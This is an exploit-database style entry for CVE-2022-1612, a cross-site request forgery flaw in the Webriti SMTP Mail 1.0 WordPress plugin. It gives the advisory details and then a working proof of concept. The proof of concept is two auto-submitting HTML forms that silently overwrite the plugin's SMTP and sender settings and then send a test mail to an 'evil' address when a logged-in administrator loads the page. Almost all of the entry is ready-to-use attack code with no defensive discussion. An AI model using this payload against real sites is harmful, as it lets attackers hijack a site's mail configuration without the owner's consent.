CVE: CVE-2022-1612

Name: Webriti SMTP Mail (webriti-smtp-mail)

Version: 1.0

Date: 2022-04-16 17:31:58

Advisory: https://wpscan.com/vulnerability/a8cec792-6435-4047-bca8-597c104dbc1f

Type: CSRF

Exploit: 


<form action="https://example.com/wp-admin/options-general.php?page=webriti_smtpmail_panels#" method="POST">
    <input type="text" name="mail_from" value="hacke@example.com">
    <input type="text" name="mail_from_name" value="hacked">
    <input type="text" name="mailer" value="smtp">
    <input type="text" name="smtp_host" value="localhost">
    <input type="text" name="smtp_port" value="port">
    <input type="text" name="smtp_ssl" value="ssl">
    <input type="text" name="smtp_auth" value="true">
    <input type="text" name="smtp_user" value="">
    <input type="text" name="smtp_pass" value="">
    <input type="text" name="option_submit" value="Änderungen speichern">
</form>
<script>
    document.forms[0].submit();
</script>

<form action="https://example.com/wp-admin/options-general.php?page=webriti_smtpmail_panels#" method="POST">
    <input type="text" name="webrit_to" value="evil@example.com">
    <input type="text" name="webrit_test_action" value="Send Test">
</form>
<script>
    document.forms[0].submit();
</script>